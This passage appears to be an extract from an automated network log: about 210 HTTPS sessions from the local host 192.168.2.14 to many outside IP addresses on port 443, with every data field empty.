                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16421192.168.2.14535909.140.116.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16422192.168.2.144733445.131.187.32443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16423192.168.2.1454162135.248.245.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16424192.168.2.1442342206.61.101.165443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16425192.168.2.144412883.111.178.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16426192.168.2.145150887.80.25.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16427192.168.2.145470498.71.69.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16428192.168.2.1452228105.49.30.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16429192.168.2.1457278198.246.37.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16430192.168.2.144303848.126.62.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16431192.168.2.1448430210.21.19.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16432192.168.2.1440898140.28.114.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16433192.168.2.145779466.223.152.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16434192.168.2.1449700133.238.37.34443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16435192.168.2.1455466147.193.86.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16436192.168.2.1443692197.139.186.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16437192.168.2.1455148148.200.45.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16438192.168.2.1432806191.173.200.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16439192.168.2.146024032.221.77.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16440192.168.2.1432870203.190.90.248443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16441192.168.2.1452254213.13.100.1443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16442192.168.2.1438990120.118.53.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16443192.168.2.143802283.17.99.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16444192.168.2.143318676.177.192.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16445192.168.2.1435532100.201.110.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16446192.168.2.144745435.89.91.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16447192.168.2.1433202119.26.140.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16448192.168.2.145744852.20.130.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16449192.168.2.1455478175.84.108.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16450192.168.2.1447894208.177.247.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16451192.168.2.1439654181.201.142.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16452192.168.2.1450422113.153.239.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16453192.168.2.1453074154.16.157.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16454192.168.2.1443606163.103.211.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16455192.168.2.1443000138.211.105.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16456192.168.2.1438896181.40.41.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16457192.168.2.1446372209.230.40.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16458192.168.2.1440624213.98.130.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16459192.168.2.1444292209.25.183.156443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16460192.168.2.145900873.3.98.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16461192.168.2.1450100147.94.121.116443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16462192.168.2.1454622169.245.133.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16463192.168.2.144604047.153.158.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16464192.168.2.1455634159.67.37.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16465192.168.2.145506478.182.164.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16466192.168.2.1456936221.50.108.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16467192.168.2.1441156173.48.238.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16468192.168.2.1436218187.192.229.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16469192.168.2.1434432192.58.217.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16470192.168.2.143970824.253.48.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16471192.168.2.1443058199.226.15.221443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16472192.168.2.1445466173.79.238.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16473192.168.2.1456804189.15.152.143443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16474192.168.2.143873834.217.255.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16475192.168.2.145298438.223.139.156443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16476192.168.2.1455746210.64.34.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16477192.168.2.1433974145.190.9.193443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16478192.168.2.1446046209.72.245.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16479192.168.2.1440342133.87.46.239443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16480192.168.2.1440704160.144.118.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16481192.168.2.145112878.177.237.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16482192.168.2.1456794213.193.75.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16483192.168.2.1438806123.120.243.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16484192.168.2.1456402167.74.236.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16485192.168.2.143740876.97.151.237443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16486192.168.2.14493729.76.251.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16487192.168.2.1444058200.251.14.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16488192.168.2.1442988144.153.175.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16489192.168.2.143523263.4.14.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16490192.168.2.1441488147.200.151.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16491192.168.2.145968846.138.169.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16492192.168.2.1455674180.243.201.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16493192.168.2.145520694.194.6.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16494192.168.2.1445152174.128.238.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16495192.168.2.1439078197.7.129.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16496192.168.2.1436470106.249.159.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16497192.168.2.14590344.41.169.202443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16498192.168.2.143759476.212.148.167443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16499192.168.2.144330841.44.68.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16500192.168.2.1454296141.52.25.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16501192.168.2.1460334203.204.153.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16502192.168.2.1460750191.11.1.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16503192.168.2.1436524185.229.243.32443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16504192.168.2.1449242154.75.33.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16505192.168.2.1439646105.74.79.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16506192.168.2.1439112196.149.82.226443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16507192.168.2.1435322104.146.1.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16508192.168.2.1438976150.109.145.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16509192.168.2.145395699.17.171.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16510192.168.2.1439716138.133.204.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16511192.168.2.1439852142.209.241.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16512192.168.2.1459228145.212.59.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16513192.168.2.1440120174.100.86.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16514192.168.2.1456224110.32.85.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16515192.168.2.143947040.151.49.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16516192.168.2.144712820.253.144.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16517192.168.2.1454584172.163.201.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16518192.168.2.146092698.3.58.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16519192.168.2.144055632.19.98.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16520192.168.2.144024267.226.146.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16521192.168.2.145099619.74.112.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16522192.168.2.1446160198.91.34.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16523192.168.2.1445744183.128.189.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16524192.168.2.145163648.78.232.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16525192.168.2.145152281.71.2.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16526192.168.2.144685841.27.139.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16527192.168.2.1451068201.32.19.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16528192.168.2.1436222123.144.37.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16529192.168.2.1445878212.94.51.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16530192.168.2.145113282.119.0.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16531192.168.2.1454670104.133.232.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16532192.168.2.144886866.187.243.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16533192.168.2.1439888181.239.4.4443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16534192.168.2.145310241.154.92.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16535192.168.2.1440908156.13.1.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16536192.168.2.1457860218.125.50.160443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16537192.168.2.1438472221.188.83.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16538192.168.2.146066275.86.248.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16539192.168.2.144080674.238.25.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16540192.168.2.1433188153.118.39.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16541192.168.2.145764660.44.118.99443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16542192.168.2.143778670.186.80.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16543192.168.2.1454222154.232.69.220443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16544192.168.2.144543668.75.172.217443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16545192.168.2.1437444178.222.227.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16546192.168.2.1458502149.139.6.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16547192.168.2.144661639.255.114.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16548192.168.2.1451836194.210.77.116443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16549192.168.2.1449068183.103.255.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16550192.168.2.144672080.118.172.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16551192.168.2.145005080.131.33.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16552192.168.2.146050831.101.237.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16553192.168.2.145007273.145.90.169443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16554192.168.2.1457262147.191.89.209443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16555192.168.2.145883041.89.231.73443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16556192.168.2.144306474.211.64.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16557192.168.2.14394748.45.115.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16558192.168.2.1443968200.59.99.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16559192.168.2.1449504187.78.69.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16560192.168.2.143996843.109.228.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16561192.168.2.1446232167.192.108.133443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16562192.168.2.144800072.176.120.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16563192.168.2.145132283.193.178.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16564192.168.2.143438479.200.60.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16565192.168.2.1433480105.183.222.239443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16566192.168.2.143876896.27.230.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16567192.168.2.1435452120.32.184.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16568192.168.2.1457262145.16.55.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16569192.168.2.144380466.209.231.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16570192.168.2.143478477.143.58.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16571192.168.2.143347475.184.196.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16572192.168.2.1452380107.145.68.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16573192.168.2.145040086.141.35.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16574192.168.2.145499492.223.242.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16575192.168.2.145106641.109.124.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16576192.168.2.1433066211.163.208.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16577192.168.2.1441420126.135.34.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16578192.168.2.143400231.244.92.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16579192.168.2.1434938156.91.62.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16580192.168.2.1447690121.157.17.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16581192.168.2.1442042211.41.142.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16582192.168.2.1450550204.152.92.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16583192.168.2.1457970170.15.113.249443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16584192.168.2.1439542194.81.21.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16585192.168.2.144042649.57.40.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16586192.168.2.1448226221.41.23.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16587192.168.2.1447814148.56.34.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16588192.168.2.1434380143.146.52.167443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16589192.168.2.1449972142.164.168.32443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16590192.168.2.1440818203.119.174.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16591192.168.2.143719612.176.224.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16592192.168.2.143820612.79.251.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16593192.168.2.1448266189.158.7.217443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16594192.168.2.1458246129.62.81.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16595192.168.2.144359098.195.113.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16596192.168.2.1442140201.111.71.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16597192.168.2.1460622136.244.88.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16598192.168.2.144340859.77.31.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16599192.168.2.145354284.178.75.36443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16600192.168.2.1444406168.107.188.217443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16601192.168.2.1436596186.188.24.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16602192.168.2.1457766103.212.99.237443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16603192.168.2.145333632.179.137.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16604192.168.2.1453866167.19.1.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16605192.168.2.1443050202.202.154.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16606192.168.2.143629842.10.173.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16607192.168.2.143647667.188.210.226443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16608192.168.2.143335446.101.44.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16609192.168.2.143921298.82.201.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16610192.168.2.1447402202.43.44.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16611192.168.2.145655690.244.117.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16612192.168.2.1444670122.150.178.245443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16613192.168.2.146073293.34.218.193443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16614192.168.2.1449630213.24.253.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16615192.168.2.1458790223.69.112.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16616192.168.2.14359768.120.33.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16617192.168.2.1436412199.44.204.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16618192.168.2.145225612.28.208.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16619192.168.2.145136032.106.38.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16620192.168.2.144367831.129.251.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16621192.168.2.1452988186.131.174.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16622192.168.2.143652880.84.167.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16623192.168.2.1460872132.134.198.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16624192.168.2.145833448.69.193.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16625192.168.2.14518421.24.207.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16626192.168.2.1443464191.122.30.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16627192.168.2.1445118203.34.141.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16628192.168.2.143967050.175.133.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16629192.168.2.144058670.116.252.229443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16630192.168.2.1457700157.96.132.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16631192.168.2.143517273.90.190.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16632192.168.2.145510078.239.112.34443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
